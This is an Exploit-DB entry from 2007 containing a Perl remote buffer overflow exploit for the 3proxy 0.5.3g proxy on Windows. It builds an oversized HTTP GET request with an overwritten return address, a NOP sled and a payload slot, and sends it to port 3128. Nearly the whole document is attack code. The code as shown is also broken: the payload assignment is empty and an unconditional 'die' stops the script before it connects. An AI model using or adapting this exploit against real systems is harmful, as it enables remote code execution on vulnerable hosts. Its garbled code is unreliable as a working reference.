3proxy 0.5.3g logurl Remote Buffer Overflow Exploit Win32 pl

ID EDB-ID:4754
Type exploitdb
Reporter Marcin Kozlowski
Modified 2007-12-18T00:00:00


3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl). Remote exploit for windows platform

#This module exploits a stack overflow in 3Proxy prior to 0.5.3h, and 0.6b-devel before 20070413. By sending a long host header in HTTP GET request to the default port of # 3128, a remote attacker could overflow a buffer and execute arbitrary code.
# Marcin Kozlowski based on vade79 PoC

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our nopsled
$nopsled = "\x90"x36;
$A = "A" x 1064;
$B = "B" x 999;

#execute calc.exe
$payload = 


#our extended instruction pointer which we use to overwrite the remote eip
#remeber to make it little-endian format

$eip = "\x72\x93\xab\x71"; #call esp

#we construct our full attackstring here
$attackstring = "GET /".$A.$eip.$nopsled.$payload." HTTP/1.0\nHost: ".$B."\n\n";

print $attackstring;

#view a message if no ip address is given

die "You have to provide the target's IP Address..\n";


#the remote port to connect to
$port = '3128';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                                Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $attackstring;

#close the connection

# milw0rm.com [2007-12-18]